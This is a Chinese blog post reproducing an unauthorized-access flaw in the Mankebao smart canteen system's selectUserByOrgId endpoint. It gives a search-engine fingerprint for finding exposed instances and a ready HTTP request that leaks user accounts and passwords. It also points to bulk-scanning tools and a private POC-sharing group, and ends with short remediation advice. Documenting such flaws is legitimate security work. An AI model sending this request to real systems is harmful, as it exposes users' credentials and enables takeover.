【漏洞复现】满客宝智慧食堂系统 selectUserByOrgId 未授权访问漏洞

已于 2024-08-06 10:19:40 修改
阅读量152 收藏 1
点赞数 6
分类专栏: 漏洞复现篇 文章标签: 满客宝智慧食堂系统 未授权
于 2024-08-06 10:18:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/140947661
版权

0x01 产品简介

满客宝智慧食堂系统由正奇晟业(北京)科技有限公司开发,旨在通过科技手段提升食堂的服务水平和就餐体验。该系统支持多种食堂就餐形式,如自选餐、自助餐、档口就餐、预订取餐等,满足不同场景下的餐饮需求,系统是一款专为学校、企业等团餐场景设计的智慧化解决方案,该系统通过集成人脸识别技术、信息化管理系统以及多种智能硬件设备,实现了食堂运营的高效化、智能化和便捷化。

0x02 漏洞概述

由于满客宝智慧食堂系统 selectUserByOrgId 接口处未进行权限控制,导致未经身份验证的远程攻击者可以未授权访问,泄露系统用户账号密码等信息,进一步破解即可登录系统后台,使系统处于极不安全的状态。

0x03 搜索引擎

icon_hash="-409875651"

在这里插入图片描述

0x04 漏洞复现

GET /yuding/selectUserByOrgId.action?record= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限
2、升级至安全版本

SuperherRo
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
满客智慧食堂系统 selectUserByOrgId 授权访问漏洞复现
0xSec
08-01 577
由于满客智慧食堂系统 selectUserByOrgId 接口处进行权限控制,导致经身份验证的远程攻击者可以授权访问,泄露系统用户账号密码等信息,进一步破解即可登录系统后台,导致系统处于极不安全的状态。
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC 授权访问漏洞复现
qq_51577576的博客
09-03 1456
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC授权访问漏洞复现 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。...
Jupyter Notebook 授权访问 漏洞复现
Senimo
07-23 965
Jupyter Notebook 授权访问 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。 如果管理员为 Jupyter Notebook 配置密码,将导致授权访问漏洞,游客可在其中创建一个 console 并执行任意 Python 代码和命令。 二、漏洞影响 三、漏洞复现 1、环境搭建 使用 Vulhub 在
InfluxDB 授权访问 漏洞复现
Senimo
07-15 4738
InfluxDB 授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC参考链接 一、漏洞描述 InfluxDB 是一个开源分布式时序、时间和指标数据库,使用 Go 语言编写,无需外部依赖。其设计目标是实现分布式和水平伸缩扩展,是 InfluxData 的核心产品。其使用 jwt 作为鉴权方式。在用户开启了认证,但设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在 InfluxDB 中执行SQL语句。 二、漏洞
Redis 授权访问 CNNVD-201511-230 漏洞复现
Senimo
05-03 1920
CNNVD-201511-230 Redis 授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 Redis 是美国 RedisLabs 公司赞助的一套开源的使用 ANSIC 编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的 API。Redis 中存在授权访问漏洞,该漏洞源于程序在默认配置下会绑定在 6379 端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序
[ 漏洞复现篇 ] Joomla授权访问Rest API漏洞(CVE-2023-23752)
qq_51577576的博客
03-21 3347
[ 漏洞复现篇 ] Joomla授权访问Rest API漏洞(CVE-2023-23752)
Docker API 授权访问漏洞复现
LuckySec
08-31 5407
PS:欢迎访问我的个人博客 http://luckyzmj.cn 0x01 漏洞简介 该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 Docker API 授权访问漏洞分析和利用 0x02 环境准备 靶机环境:192.168.126.130 (ubuntu) 攻击环境:192.168.126.128 (kali) 在靶机上使用vulhub复现漏洞环境。 vulhub官网地址:https://vulhub.
漏洞复现----22、Redis授权访问漏洞
七天
07-15 1797
文章目录一、简介二、漏洞环境三、漏洞复现1、授权访问2、写入webshell3、利用公私钥获取root权限4、计划任务反弹shell 一、简介 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存也可以持久化的日执行、Key-Value数据库。 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有添加防火墙规则避免其他非信任来源 ip 访问等策略时,会将 Redis 服务暴露到公网上;如果在没有设置密码认证(一般为空)的情况下,会导致任意用户授权访问 Redis 以及
常见授权访问漏洞详解
m0_55854679的博客
05-15 3221
参考文章1:二十八种授权访问漏洞合集 参考文章2:28种授权访问漏洞 简介 授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 常见的授权访问漏洞 MongoDB 授权访问漏洞 漏洞信息 开启MongoDB服务时不添加任何参数,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作【增、删、改、查高危动作】而且可以远程访问数据库。 造成授权访问的根本原因就在于启动 Mongodb
zookeeper授权访问修复建议
07-14
ZooKeeper 授权访问修复建议 ZooKeeper 作为一个分布式应用程序协调服务,提供了高效、可靠的分布式锁、队列、节点管理等功能。但是,如果 ZooKeeper 没有正确地配置访问权限,就可能会出现授权访问的问题,...
开关电源中,穿越频率的大致选择范围
08-05
在开关电源设计之中,穿越频率是一个相当重要的指标。在文中从就开关电源设计中的环路反馈控制方法、环路增益作 用进行了阐述。并在此基础上就穿越频率选取的限制条件进行分析,为开关电源设计中的穿越频率选取提供借鉴。 穿越频率 ;开关电源设计 ;选取方法 ;限制条件 开关电源设计过程中,环路反馈控制回路的的性能决定了电 源的精度和整体性能,因此设计一个优良的环路控制回路对开发 一个开关电源系统至关重要。其中穿越频率的选取又是反馈回路 设计中的关键因数。
销售员各月销售提成计算.xlsx.xlsx
08-05
销售管理表,财务报表,占比分析,消费能力分析,日程安排,提成表,考核表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
营销数据看板-多样式分析销售数.xlsx.xlsx
最新发布
08-05
销售管理表,财务报表,占比分析,消费能力分析,日程安排,提成表,考核表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
新产品市场调查结果与分析.xlsx.xlsx
08-05
销售管理表,财务报表,占比分析,消费能力分析,日程安排,提成表,考核表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
Java JMX 授权访问漏洞复现
06-28
JMX(Java Management Extensions)是Java平台提供的一种管理Java应用程序和组件的标准机制。然而,如果不妥善配置,JMX服务可能会存在授权访问漏洞,允许授权的用户获取敏感信息或执行操作。 复现Java JMX授权访问漏洞的一般步骤如下: 1. **环境准备**: - 确保目标系统上启用了JMX,并且有一个可远程管理的应用程序暴露了MBean(Managed Bean)。 - 需要一个支持JMX的客户端工具,如Java自带的`jconsole`或第三方工具如`jmxterm`。 2. **识别目标服务**: - 使用`jconsole`或类似工具扫描目标服务器,查看哪些MBeans正在监听并开放到网络。 3. **验证权限**: - 通常JMX默认使用`java.security.auth.login.config`文件中的用户和密码来管理访问控制。检查此配置是否允许匿名访问或者有明显的错误。 4. **尝试连接**: - 如果配置允许,可以直接使用`jconsole`、`jmxterm`等工具尝试连接,看是否能无授权访问MBean。 5. **发现漏洞**: - 如果能够无授权访问,那么说明存在授权访问漏洞,可能是因为没有正确配置访问策略,或者是默认的匿名权限设置过于宽松。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值